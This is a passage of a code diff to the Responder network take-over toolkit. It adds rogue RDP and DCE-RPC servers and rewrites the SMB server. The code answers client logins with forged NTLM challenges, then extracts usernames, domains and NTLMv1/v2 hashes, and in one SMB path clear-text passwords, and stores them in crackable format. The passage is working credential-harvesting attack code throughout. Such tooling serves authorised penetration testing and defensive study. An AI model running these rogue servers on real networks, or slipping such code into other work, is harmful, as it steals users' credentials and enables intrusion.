+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
+
+		SaveToDb({
+			'module': 'RDP', 
+			'type': 'NTLMv1-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 60:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+
+		SaveToDb({
+			'module': 'RDP', 
+			'type': 'NTLMv2-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+
+def FindNTLMNegoStep(data):
+	NTLMStart  = data.find(b'NTLMSSP')
+	NTLMString = data[NTLMStart:]
+	NTLMStep = NTLMString[8:12]
+	if NTLMStep == b'\x01\x00\x00\x00':
+		return NTLMStep
+	if NTLMStep == b'\x03\x00\x00\x00':
+		return NTLMStep
+	else:
+		return False
+
+class RDP(BaseRequestHandler):
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			self.request.settimeout(30)
+			Challenge = RandomChallenge()
+
+			if data[11:12] == b'\x01':
+				x =  X224(Data=RDPNEGOAnswer())
+				x.calculate()
+				h = TPKT(Data=x)
+				h.calculate()
+				buffer1 = str(h)
+				self.request.send(NetworkSendBufferPython2or3(buffer1))
+				SSLsock = ssl.wrap_socket(self.request, certfile=cert, keyfile=key, ssl_version=ssl.PROTOCOL_TLS,server_side=True)
+				SSLsock.settimeout(30)
+				data = SSLsock.read(8092)
+				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
+					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					x.calculate()
+					SSLsock.write(NetworkSendBufferPython2or3(x))
+					data = SSLsock.read(8092)
+					if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
+						ParseNTLMHash(data,self.client_address[0], Challenge)
+
+			##Sometimes a client sends a routing cookie; we don't want to miss that let's look at it the other way around..
+			if data[len(data)-4:] == b'\x03\x00\x00\x00':
+				x =  X224(Data=RDPNEGOAnswer())
+				x.calculate()
+				h = TPKT(Data=x)
+				h.calculate()
+				buffer1 = str(h)
+				self.request.send(NetworkSendBufferPython2or3(buffer1))
+				data = self.request.recv(8092)
+
+				SSLsock = ssl.wrap_socket(self.request, certfile=cert, keyfile=key, ssl_version=ssl.PROTOCOL_TLS,server_side=True)
+				data = SSLsock.read(8092)
+				if FindNTLMNegoStep(data) == b'\x01\x00\x00\x00':
+					x = RDPNTLMChallengeAnswer(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					x.calculate()
+					SSLsock.write(NetworkSendBufferPython2or3(x))
+					data = SSLsock.read(8092)
+					if FindNTLMNegoStep(data) == b'\x03\x00\x00\x00':
+						ParseNTLMHash(data,self.client_address[0], Challenge)
+
+			else:
+				return False
+		except:
+			pass
--- a/servers/RPC.py
+++ b/servers/RPC.py
@@ -0,0 +1,214 @@
+#!/usr/bin/env python
+# This file is part of Responder, a network take-over set of tools 
+# created and maintained by Laurent Gaffie.
+# email: laurent.gaffie@gmail.com
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+from utils import *
+import struct
+import re
+import ssl
+import codecs
+
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+from packets import RPCMapBindAckAcceptedAns, RPCMapBindMapperAns, RPCHeader, NTLMChallenge, RPCNTLMNego
+
+NDR = "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60" #v2
+Map = "\x33\x05\x71\x71\xba\xbe\x37\x49\x83\x19\xb5\xdb\xef\x9c\xcc\x36" #v1
+MapBind = "\x08\x83\xaf\xe1\x1f\x5d\xc9\x11\x91\xa4\x08\x00\x2b\x14\xa0\xfa"
+
+#for mapper
+DSRUAPI  = "\x35\x42\x51\xe3\x06\x4b\xd1\x11\xab\x04\x00\xc0\x4f\xc2\xdc\xd2"  #v4
+LSARPC   = "\x78\x57\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\x89\xab" #v0
+NETLOGON = "\x78\x56\x34\x12\x34\x12\xcd\xab\xef\x00\x01\x23\x45\x67\xcf\xfb" #v1
+WINSPOOL = "\x96\x3f\xf0\x76\xfd\xcd\xfc\x44\xa2\x2c\x64\x95\x0a\x00\x12\x09" #v1
+
+
+
+def Chose3264x(packet):
+	if Map32 in packet:
+		return Map32
+	else:
+		return Map64
+
+def FindNTLMOpcode(data):
+	SSPIStart  = data.find(b'NTLMSSP')
+	if SSPIStart == -1:
+		return False
+	SSPIString = data[SSPIStart:]
+	return SSPIString[8:12]
+
+def ParseRPCHash(data,client, Challenge):  #Parse NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
+
+	if NthashLen == 24:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))
+
+		SaveToDb({
+			'module': 'DCE-RPC', 
+			'type': 'NTLMv1-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+	if NthashLen > 60:
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])
+
+		SaveToDb({
+			'module': 'DCE-RPC', 
+			'type': 'NTLMv2-SSP', 
+			'client': client, 
+			'user': Domain+'\\'+Username, 
+			'hash': SMBHash, 
+			'fullhash': WriteHash,
+		})
+
+class RPCMap(BaseRequestHandler):
+	def handle(self):
+		try:
+			data = self.request.recv(1024)
+			self.request.settimeout(5)
+			Challenge = RandomChallenge()
+			if data[0:3] == b"\x05\x00\x0b":#Bind Req.
+				#More recent windows version can and will bind on port 135...Let's grab it.
+				if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+					n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					n.calculate()
+					RPC = RPCNTLMNego(Data=n)
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					data = self.request.recv(1024)
+
+					if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+						ParseRPCHash(data, self.client_address[0], Challenge)
+						self.request.close()
+
+				if NetworkSendBufferPython2or3(Map) in data:# Let's redirect to Mapper.
+					RPC = RPCMapBindAckAcceptedAns(CTX1UID=Map, CTX1UIDVersion="\x01\x00\x00\x00",CallID=NetworkRecvBufferPython2or3(data[12:16]))
+
+
+				if NetworkSendBufferPython2or3(NDR) in data and NetworkSendBufferPython2or3(Map) not in data: # Let's redirect to Mapper.
+					RPC = RPCMapBindAckAcceptedAns(CTX1UID=NDR, CTX1UIDVersion="\x02\x00\x00\x00", CallID=NetworkRecvBufferPython2or3(data[12:16]))
+
+
+				RPC.calculate()
+				self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+				data = self.request.recv(1024)
+
+			if data[0:3] == b"\x05\x00\x00":#Mapper Response.
+
+				# DSRUAPI
+				if NetworkSendBufferPython2or3(DSRUAPI) in data:
+					x = RPCMapBindMapperAns()
+					x.calculate()
+					RPC =  RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					data = self.request.recv(1024)
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto DSRUAPI auth server." % (self.client_address[0]), 3, 1))
+					self.request.close()
+
+				#LSARPC
+				if NetworkSendBufferPython2or3(LSARPC) in data:
+					x = RPCMapBindMapperAns(Tower1UID=LSARPC,Tower1Version="\x00\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
+					x.calculate()
+					RPC =  RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					data = self.request.recv(1024)
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto LSARPC auth server." % (self.client_address[0]), 3, 1))
+					self.request.close()
+
+				#WINSPOOL
+				if NetworkSendBufferPython2or3(WINSPOOL) in data:
+					x = RPCMapBindMapperAns(Tower1UID=WINSPOOL,Tower1Version="\x01\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
+					x.calculate()
+					RPC =  RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					RPC.calculate()
+					self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					data = self.request.recv(1024)
+					print(color("[*] [DCE-RPC Mapper] Redirected %-15sto WINSPOOL auth server." % (self.client_address[0]), 3, 1))
+					self.request.close()
+
+				#NetLogon
+				if NetworkSendBufferPython2or3(NETLOGON) in data:
+					self.request.close()
+					# For now, we don't want to establish a secure channel... we want NTLM.
+
+					#x = RPCMapBindMapperAns(Tower1UID=NETLOGON,Tower1Version="\x01\x00",Tower2UID=NDR,Tower2Version="\x02\x00")
+					#x.calculate()
+					#RPC =  RPCHeader(Data = x, CallID=NetworkRecvBufferPython2or3(data[12:16]))
+					#RPC.calculate()
+					#self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+					#data = self.request.recv(1024)
+					#print(color("[*] [DCE-RPC Mapper] Redirected %-15sto NETLOGON auth server." % (self.client_address[0]), 3, 1))
+
+		except Exception:
+			self.request.close()
+			pass
+
+
+
+class RPCMapper(BaseRequestHandler):
+	def handle(self):
+		try:
+			data = self.request.recv(2048)
+			self.request.settimeout(3)
+			Challenge = RandomChallenge()
+
+			if FindNTLMOpcode(data) == b"\x01\x00\x00\x00":
+				n = NTLMChallenge(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+				n.calculate()
+				RPC = RPCNTLMNego(Data=n)
+				RPC.calculate()
+				self.request.send(NetworkSendBufferPython2or3(str(RPC)))
+				data = self.request.recv(1024)
+
+			if FindNTLMOpcode(data) == b"\x03\x00\x00\x00":
+				ParseRPCHash(data, self.client_address[0], Challenge)
+				self.request.close()
+
+		except Exception:
+			self.request.close()
+			pass
+
+
--- a/servers/SMB.py
+++ b/servers/SMB.py
@@ -14,12 +14,15 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct, re
+import codecs
+from utils import *
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from random import randrange
 from packets import SMBHeader, SMBNegoAnsLM, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData, SMB2Header, SMB2NegoAns, SMB2Session1Data, SMB2Session2Data
-from SocketServer import BaseRequestHandler
-from utils import *
-import struct
-import re


 def Is_Anonymous(data):  # Detect if SMB auth was Anonymous
@@ -43,30 +46,25 @@ def Parse_Nego_Dialect(data):
 		if Dialect[i] == 'NT LM 0.12':
 			return chr(i) + '\x00'

-
 def midcalc(data):  #Set MID SMB Header field.
    return data[34:36]

-
-
 def uidcalc(data):  #Set UID SMB Header field.
    return data[32:34]

-
 def pidcalc(data):  #Set PID SMB Header field.
    pack=data[30:32]
    return pack

-
 def tidcalc(data):  #Set TID SMB Header field.
    pack=data[28:30]
    return pack

 def ParseShare(data):
 	packet = data[:]
-	a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
+	a = re.search(b'(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
 	if a:
-		print text("[SMB] Requested Share     : %s" % a.group(0).decode('UTF-16LE'))
+		print(text("[SMB] Requested Share     : %s" % a.group(0).decode('UTF-16LE')))

 def GrabMessageID(data):
    Messageid = data[28:36]
@@ -74,8 +72,8 @@ def GrabMessageID(data):

 def GrabCreditRequested(data):
    CreditsRequested = data[18:20]
-    if CreditsRequested == "\x00\x00":
-       CreditsRequested =  "\x01\x00"
+    if CreditsRequested == b'\x00\x00':
+       CreditsRequested =  b'\x01\x00'
    else:
       CreditsRequested = data[18:20]
    return CreditsRequested
@@ -88,34 +86,26 @@ def GrabSessionID(data):
    SessionID = data[44:52]
    return SessionID

-def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
-	SecBlobLen = struct.unpack('<H',data[51:53])[0]
-	BccLen     = struct.unpack('<H',data[61:63])[0]
-
-	if SecBlobLen < 260:
-		SSPIStart    = data[75:]
-		LMhashLen    = struct.unpack('<H',data[89:91])[0]
-		LMhashOffset = struct.unpack('<H',data[91:93])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		NthashLen    = struct.unpack('<H',data[97:99])[0]
-		NthashOffset = struct.unpack('<H',data[99:101])[0]
-	else:
-		SSPIStart    = data[79:]
-		LMhashLen    = struct.unpack('<H',data[93:95])[0]
-		LMhashOffset = struct.unpack('<H',data[95:97])[0]
-		LMHash       = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-		NthashLen    = struct.unpack('<H',data[101:103])[0]
-		NthashOffset = struct.unpack('<H',data[103:105])[0]
+def ParseSMBHash(data,client, Challenge):  #Parse SMB NTLMSSP v1/v2
+	SSPIStart  = data.find(b'NTLMSSP')
+	SSPIString = data[SSPIStart:]
+	LMhashLen    = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
+	LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
+	LMHash       = SSPIString[LMhashOffset:LMhashOffset+LMhashLen]
+	LMHash	     = codecs.encode(LMHash, 'hex').upper().decode('latin-1')
+	NthashLen    = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
+	NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]

 	if NthashLen == 24:
-		SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		DomainLen    = struct.unpack('<H',data[105:107])[0]
-		DomainOffset = struct.unpack('<H',data[107:109])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-		UserLen      = struct.unpack('<H',data[113:115])[0]
-		UserOffset   = struct.unpack('<H',data[115:117])[0]
-		Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, codecs.encode(Challenge,'hex').decode('latin-1'))

 		SaveToDb({
 			'module': 'SMB', 
@@ -127,14 +117,15 @@ def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
 		})

 	if NthashLen > 60:
-		SMBHash      = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-		DomainLen    = struct.unpack('<H',data[109:111])[0]
-		DomainOffset = struct.unpack('<H',data[111:113])[0]
-		Domain       = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-		UserLen      = struct.unpack('<H',data[117:119])[0]
-		UserOffset   = struct.unpack('<H',data[119:121])[0]
-		Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
+		SMBHash      = SSPIString[NthashOffset:NthashOffset+NthashLen]
+		SMBHash      = codecs.encode(SMBHash, 'hex').upper().decode('latin-1')
+		DomainLen    = struct.unpack('<H',SSPIString[30:32])[0]
+		DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
+		Domain       = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
+		UserLen      = struct.unpack('<H',SSPIString[38:40])[0]
+		UserOffset   = struct.unpack('<H',SSPIString[40:42])[0]
+		Username     = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
+		WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), SMBHash[:32], SMBHash[32:])

 		SaveToDb({
 			'module': 'SMB', 
@@ -145,43 +136,17 @@ def ParseSMBHash(data,client):  #Parse SMB NTLMSSP v1/v2
 			'fullhash': WriteHash,
 		})

-
-def ParseSMB2NTLMv2Hash(data,client):  #Parse SMB NTLMv2
-    SSPIStart = data[113:]
-    data = data[113:]
-    LMhashLen = struct.unpack('<H',data[12:14])[0]
-    LMhashOffset = struct.unpack('<H',data[16:18])[0]
-    LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-    NthashLen = struct.unpack('<H',data[22:24])[0]
-    NthashOffset = struct.unpack('<H',data[24:26])[0]
-    SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-    DomainLen = struct.unpack('<H',data[30:32])[0]
-    DomainOffset = struct.unpack('<H',data[32:34])[0]
-    Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
-    UserLen      = struct.unpack('<H',data[38:40])[0]
-    UserOffset   = struct.unpack('<H',data[40:42])[0]
-    Username     = SSPIStart[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
-    WriteHash    = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
-    SaveToDb({
-                'module': 'SMBv2', 
-		'type': 'NTLMv2-SSP', 
-		'client': client, 
-		'user': Domain+'\\'+Username, 
-		'hash': SMBHash, 
-		'fullhash': WriteHash,
-             })
-
-def ParseLMNTHash(data, client):  # Parse SMB NTLMv1/v2
+def ParseLMNTHash(data, client, Challenge):  # Parse SMB NTLMv1/v2
 	LMhashLen = struct.unpack('<H',data[51:53])[0]
 	NthashLen = struct.unpack('<H',data[53:55])[0]
 	Bcc = struct.unpack('<H',data[63:65])[0]
-	Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
+	Username, Domain = tuple([e.decode('latin-1') for e in data[89+NthashLen:Bcc+60].split(b'\x00\x00\x00')[:2]])

 	if NthashLen > 25:
-		FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
+		FullHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex')
 		LmHash = FullHash[:32].upper()
 		NtHash = FullHash[32:].upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
+		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, codecs.encode(Challenge,'hex').decode('latin-1'), LmHash.decode('latin-1'), NtHash.decode('latin-1'))
 	
 		SaveToDb({
 			'module': 'SMB', 
@@ -193,10 +158,9 @@ def ParseLMNTHash(data, client):  # Parse SMB NTLMv1/v2
 		})

 	if NthashLen == 24:
-		NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
-		LmHash = data[65:65+LMhashLen].encode('hex').upper()
-		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
-
+		NtHash = codecs.encode(data[65+LMhashLen:65+LMhashLen+NthashLen],'hex').upper()
+		LmHash = codecs.encode(data[65:65+LMhashLen],'hex').upper()
+		WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash.decode('latin-1'), NtHash.decode('latin-1'), codecs.encode(Challenge,'hex').decode('latin-1'))
 		SaveToDb({
 			'module': 'SMB', 
 			'type': 'NTLMv1', 
@@ -220,7 +184,7 @@ def IsNT4ClearTxt(data, client):
 			if PassLen > 2:
 				Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
 				User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
-				print text("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
+				print(text("[SMB] Clear Text Credentials: %s:%s" % (User,Password)))
 				WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)


@@ -231,6 +195,7 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 			while True:
 				data = self.request.recv(1024)
 				self.request.settimeout(1)
+				Challenge = RandomChallenge()

 				if not data:
 					break
@@ -241,203 +206,162 @@ class SMB1(BaseRequestHandler):  # SMB1 & SMB2 Server class, NTLMSSP
 						self.request.send(Buffer)
 						data = self.request.recv(1024)
 					except:
+						raise
 						pass

-
                                ##Negotiate proto answer SMBv2.
-				if data[8:10] == "\x72\x00" and re.search("SMB 2.\?\?\?", data):
-              				head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
-            				t = SMB2NegoAns()
-         				t.calculate()
-        				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-      				        self.request.send(buffer1)
-      				        data = self.request.recv(1024)
-                                ## Session Setup 1 answer SMBv2.
-				if data[16:18] == "\x00\x00" and data[4:5] == "\xfe":
-              				head = SMB2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
-              				t = SMB2NegoAns(Dialect="\x10\x02")
-              				t.calculate()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-                                ## Session Setup 2 answer SMBv2.
-				if data[16:18] == "\x01\x00" and data[4:5] == "\xfe":
-              				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID=GrabSessionID(data),NTStatus="\x16\x00\x00\xc0")
-              				t = SMB2Session1Data()
-              				t.calculate()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-                                ## Session Setup 3 answer SMBv2.
-				if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02" and data[4:5] == "\xfe":
-              				ParseSMB2NTLMv2Hash(data, self.client_address[0])
-              				head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data))
-              				t = SMB2Session2Data()
-              				packet1 = str(head)+str(t)
-       				        buffer1 = struct.pack(">i", len(''.join(packet1)))+packet1  
-              				self.request.send(buffer1)
-              				data = self.request.recv(1024)
-
-                                # Negotiate Protocol Response smbv1
-				if data[8:10] == "\x72\x00" and data[4:5] == "\xff" and re.search("SMB 2.\?\?\?", data) == None:
-				        Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
-					Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
-					Body.calculate()
-		
-					Packet = str(Header)+str(Body)
-					Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-
-					self.request.send(Buffer)
+				if data[8:10] == b"\x72\x00" and re.search(b"SMB 2.\?\?\?", data):
+					head = SMB2Header(CreditCharge="\x00\x00",Credits="\x01\x00")
+					t = SMB2NegoAns()
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
 					data = self.request.recv(1024)

-				if data[8:10] == "\x73\x00" and data[4:5] == "\xff":  # Session Setup AndX Request smbv1
+                                ## Nego answer SMBv2.
+				if data[16:18] == b"\x00\x00" and data[4:5] == b"\xfe":
+					head = SMB2Header(MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'))
+					t = SMB2NegoAns(Dialect="\x10\x02")
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+                                ## Session Setup 2 answer SMBv2.
+				if data[16:18] == b"\x01\x00" and data[4:5] == b"\xfe":
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), SessionID=GrabSessionID(data).decode('latin-1'),NTStatus="\x16\x00\x00\xc0")
+					t = SMB2Session1Data(NTLMSSPNtServerChallenge=NetworkRecvBufferPython2or3(Challenge))
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+                                ## Session Setup 3 answer SMBv2.
+				if data[16:18] == b'\x01\x00' and GrabMessageID(data)[0:1] == b'\x02' or GrabMessageID(data)[0:1] == b'\x03' and data[4:5] == b'\xfe':
+					ParseSMBHash(data, self.client_address[0], Challenge)
+					head = SMB2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data).decode('latin-1'), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data).decode('latin-1'), Credits=GrabCreditRequested(data).decode('latin-1'), NTStatus="\x22\x00\x00\xc0", SessionID=GrabSessionID(data).decode('latin-1'))
+					t = SMB2Session2Data()
+					packet1 = str(head)+str(t)
+					buffer1 = StructPython2or3('>i', str(packet1))+str(packet1)
+					self.request.send(NetworkSendBufferPython2or3(buffer1))
+					data = self.request.recv(1024)
+
+                                # Negotiate Protocol Response smbv1
